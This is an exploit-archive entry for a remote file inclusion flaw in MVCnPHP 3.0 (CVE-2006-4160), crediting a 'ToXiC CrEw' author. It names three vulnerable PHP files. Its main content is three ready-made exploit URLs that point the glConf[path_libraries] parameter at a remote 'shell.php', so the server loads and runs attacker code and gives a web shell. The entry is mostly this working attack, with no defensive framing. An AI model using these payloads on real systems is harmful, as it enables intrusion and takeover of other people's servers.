MVCnPHP 3.0 - glConf[path_libraries] Remote File Inclusion

Author: Drago84
type: webapps
platform: php
port: 
date_added: 2006-08-09  
date_updated:   
verified: 1  
codes: OSVDB-27896;CVE-2006-4160;OSVDB-27895;OSVDB-27894  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 2173.txt  
MVCnPHP Remote File Inclusion

############ToXiC CrEw###############

Bug Found by Drago84

Page  Sources:
http://freshmeat.net/redir/mvcnphp/46123/url_tgz/Geeklog_MVCnPHP-3.0.0.tgz

Page Affect:
BaseCommand.php
BaseLoader.php
BaseView.php

ExP:
http://server/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://server/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://server/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://evalsite.com/shell.php

# milw0rm.com [2006-08-10]